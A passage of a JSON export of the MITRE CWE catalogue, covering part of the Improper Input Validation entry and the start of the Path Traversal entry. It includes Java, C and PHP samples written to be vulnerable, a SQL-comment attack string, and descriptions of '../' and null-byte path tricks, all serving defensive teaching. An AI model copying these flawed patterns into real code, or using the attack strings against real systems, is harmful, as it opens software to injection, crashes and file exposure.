(CWE-1173)."},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.","Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings."]}},{"Phase":"Implementation","Description":"When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined."},{"attr":{"@_Mitigation_ID":"MIT-35"},"Phase":"Implementation","Description":"Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow."},{"Phase":"Implementation","Description":"Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input\'s values fall within the expected range of allowable values and that multi-field consistencies are maintained."},{"Phase":"Implementation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.","Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content."]}},{"Phase":"Implementation","Description":"When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-135"},"Intro_Text":"This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...public static final double price = 20.00;int quantity = currentUser.getAttribute(\\"quantity\\");double total = price * quantity;chargeUser(total);...","xhtml:br":["","","","",""]}},"Body_Text":"The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited."},{"attr":{"@_Demonstrative_Example_ID":"DX-136"},"Intro_Text":"This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...#define MAX_DIM 100...int m,n, error;board_square_t *board;printf(\\"Please specify the board height: \\\\n\\");error = scanf(\\"%d\\", &amp;m);if ( EOF == error ){}printf(\\"Please specify the board width: \\\\n\\");error = scanf(\\"%d\\", &amp;n);if ( EOF == error ){}if ( m &gt; MAX_DIM || n &gt; MAX_DIM ) {}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));...","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":"/* board dimensions */","xhtml:div":[{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"Value too large: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program."},{"Intro_Text":"The following example shows a PHP application in which the programmer attempts to display a user\'s birthday and homepage.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$birthday = $_GET[\'birthday\'];$homepage = $_GET[\'homepage\'];echo \\"Birthday: $birthday&lt;br&gt;Homepage: &lt;a href=$homepage&gt;click here&lt;/a&gt;\\"","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"2009-01-09--"}],"Body_Text":["The programmer intended for $birthday to be in a date format and $homepage to be a valid URL. However, since the values are derived from an HTTP request, if an attacker can trick a victim into clicking a crafted URL with &lt;script&gt; tags providing the values for birthday and / or homepage, then the script will run on the client\'s browser when the web server echoes the content. Notice that even if the programmer were to defend the $birthday variable by restricting input to integers and dashes, it would still be possible for an attacker to provide a string of the form:","If this data were used in a SQL statement, it would treat the remainder of the statement as a comment. The comment could disable other security-related logic in the statement. In this case, encoding combined with input validation would be a more useful protection mechanism.","Furthermore, an XSS (CWE-79) attack or SQL injection (CWE-89) are just a few of the potential consequences when input validation is not used. Depending on the context of the code, CRLF Injection (CWE-93), Argument Injection (CWE-88), or Command Injection (CWE-77) may also be possible."]},{"attr":{"@_Demonstrative_Example_ID":"DX-34"},"Intro_Text":"The following example takes a user-supplied value to allocate an array of objects and then operates on the array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void buildList ( int untrustedListSize ){}","xhtml:div":{"#text":"if ( 0 &gt; untrustedListSize ){}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"die(\\"Negative value supplied for list size, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}},"Body_Text":"This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown."},{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5305","Description":"Eval injection in Perl program using an ID that should only contain hyphens and numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5305"},{"Reference":"CVE-2008-2223","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223"},{"Reference":"CVE-2008-3477","Description":"lack of input validation in spreadsheet program leads to buffer overflows, integer overflows, array index errors, and memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3477"},{"Reference":"CVE-2008-3843","Description":"insufficient validation enables XSS","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3843"},{"Reference":"CVE-2008-3174","Description":"driver in security product allows code execution due to insufficient validation","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3174"},{"Reference":"CVE-2007-3409","Description":"infinite loop from DNS packet with a label that points to itself","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3409"},{"Reference":"CVE-2006-6870","Description":"infinite loop from DNS packet with a label that points to itself","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6870"},{"Reference":"CVE-2008-1303","Description":"missing parameter leads to crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1303"},{"Reference":"CVE-2007-5893","Description":"HTTP request with missing protocol version number leads to crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5893"},{"Reference":"CVE-2006-6658","Description":"request with missing parameters leads to information exposure","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6658"},{"Reference":"CVE-2008-4114","Description":"system crash with offset value that is inconsistent with packet size","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114"},{"Reference":"CVE-2006-3790","Description":"size field that is inconsistent with packet size leads to buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3790"},{"Reference":"CVE-2008-2309","Description":"product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2309"},{"Reference":"CVE-2008-3494","Description":"security bypass via an extra header","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3494"},{"Reference":"CVE-2008-3571","Description":"empty packet triggers reboot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3571"},{"Reference":"CVE-2006-5525","Description":"incomplete denylist allows SQL injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5525"},{"Reference":"CVE-2008-1284","Description":"NUL byte in theme name causes directory traversal impact to be worse","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1284"},{"Reference":"CVE-2008-0600","Description":"kernel does not validate an incoming pointer before dereferencing it","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0600"},{"Reference":"CVE-2008-1738","Description":"anti-virus product has insufficient input validation of hooked SSDT functions, allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1738"},{"Reference":"CVE-2008-1737","Description":"anti-virus product allows DoS via zero-length field","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1737"},{"Reference":"CVE-2008-3464","Description":"driver does not validate input from userland to the kernel","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3464"},{"Reference":"CVE-2008-2252","Description":"kernel does not validate parameters sent in from userland, allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2252"},{"Reference":"CVE-2008-2374","Description":"lack of validation of string length fields allows memory consumption or buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2374"},{"Reference":"CVE-2008-1440","Description":"lack of validation of length field leads to infinite loop","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1440"},{"Reference":"CVE-2008-1625","Description":"lack of validation of input to an IOCTL allows code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1625"},{"Reference":"CVE-2008-3177","Description":"zero-length attachment causes crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3177"},{"Reference":"CVE-2007-2442","Description":"zero-length input causes free of uninitialized pointer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442"},{"Reference":"CVE-2008-5563","Description":"crash via a malformed frame structure","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5563"},{"Reference":"CVE-2008-5285","Description":"infinite loop from a long SMTP request","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5285"},{"Reference":"CVE-2008-3812","Description":"router crashes with a malformed packet","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3812"},{"Reference":"CVE-2008-3680","Description":"packet with invalid version number leads to NULL pointer dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3680"},{"Reference":"CVE-2008-3660","Description":"crash via multiple \\".\\" characters in file extension","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3660"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Input validation and representation"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR07-C","Entry_Name":"Prefer functions that support error checking over equivalent functions that don\'t"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO30-C","Entry_Name":"Exclude user input from format strings","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM10-C","Entry_Name":"Define and use a pointer validation function"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":20,"Entry_Name":"Improper Input Handling"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"101"}},{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"109"}},{"attr":{"@_CAPEC_ID":"110"}},{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"135"}},{"attr":{"@_CAPEC_ID":"136"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"153"}},{"attr":{"@_CAPEC_ID":"182"}},{"attr":{"@_CAPEC_ID":"209"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"23"}},{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"261"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"28"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"473"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"588"}},{"attr":{"@_CAPEC_ID":"63"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"664"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"83"}},{"attr":{"@_CAPEC_ID":"85"}},{"attr":{"@_CAPEC_ID":"88"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-166"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-168","@_Section":"Input Validation Attacks"}},{"attr":{"@_External_Reference_ID":"REF-48"}},{"attr":{"@_External_Reference_ID":"REF-170"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 10, &#34;All Input Is Evil!&#34; Page 341"}},{"attr":{"@_External_Reference_ID":"REF-1109"}},{"attr":{"@_External_Reference_ID":"REF-1110"}},{"attr":{"@_External_Reference_ID":"REF-1111"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":"CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks."},{"#text":"As of 2020, this entry is used more often than preferred, and it is a source of frequent confusion. It is being actively modified for CWE 4.1 and subsequent versions.","attr":{"@_Type":"Maintenance"}},{"#text":"Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document.","attr":{"@_Type":"Maintenance"}},{"#text":"Input validation - whether missing or incorrect - is such an essential and widespread part of secure development that it is implicit in many different weaknesses. Traditionally, problems such as buffer overflows and XSS have been classified as input validation problems by many security professionals. However, input validation is not necessarily the only protection mechanism available for avoiding such problems, and in some cases it is not even sufficient. The CWE team has begun capturing these subtleties in chains within the Research Concepts view (CWE-1000), but more work is needed.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Terminology"},"xhtml:p":["The \\"input validation\\" term is extremely common, but it is used in many different ways. In some cases its usage can obscure the real underlying weakness or otherwise hide chaining and composite relationships.","Some people use \\"input validation\\" as a general term that covers many different neutralization techniques for ensuring that input is appropriate, such as filtering, canonicalization, and escaping. Others use the term in a more narrow context to simply mean \\"checking if an input conforms to expectations without changing it.\\"  CWE uses this more narrow interpretation."]}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, Relationships, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Input Validation","attr":{"@_Date":"2009-01-12"}}}},"22":{"attr":{"@_ID":"22","@_Name":"Improper Limitation of a Pathname to a Restricted Directory (\'Path Traversal\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.","Extended_Description":{"xhtml:p":["Many file operations are intended to take place within a restricted directory. By using special elements such as \\"..\\" and \\"/\\" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the \\"../\\" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as \\"/usr/local/bin\\", which may also be useful in accessing unexpected files. This is referred to as absolute path traversal.","In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack. For example, the software may add \\".txt\\" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Directory traversal"},{"Term":"Path traversal","Description":"\\"Path traversal\\" is preferred over \\"directory traversal,\\" but both terms are attack-focused."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"Automated techniques can find areas where path traversal weaknesses exist. However, tuning or customization may be required to remove or de-prioritize path-traversal problems that are only exploitable by the software\'s administrator - or other privileged users - and thus potentially valid behavior or, at worst, a bug instead of a vulnerability.","Effectiveness":"High"},{"Method":"Manual Static Analysis","Description":"Manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all file access operations can be assessed within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost 